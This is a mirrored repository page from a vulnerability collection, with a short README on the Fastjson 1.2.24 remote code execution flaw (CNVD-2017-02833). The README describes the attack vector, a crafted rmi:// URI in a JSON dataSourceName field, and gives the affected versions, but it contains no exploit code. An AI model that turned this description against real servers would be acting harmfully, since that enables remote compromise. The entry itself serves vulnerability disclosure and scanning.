admin/GobyVuls
1
0
Fork 0
mirror of https://github.com/gobysec/GobyVuls.git synced 2025-05-06 02:31:35 +00:00
Code Issues Packages Projects Releases Wiki Activity
GobyVuls/Fastjson/CNVD-2017-02833
History
tardc b146db1e67 add CNVD-2017-02833
2020-11-06 22:51:39 +08:00
..
fastjson1.2.24.gif
add CNVD-2017-02833
2020-11-06 22:51:39 +08:00
README.md
add CNVD-2017-02833
2020-11-06 22:51:39 +08:00

README.md

CNVD-2017-02833 Fastjson 1.2.24 RCE

parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.

Affected version: Fastjson < 1.2.25

Demo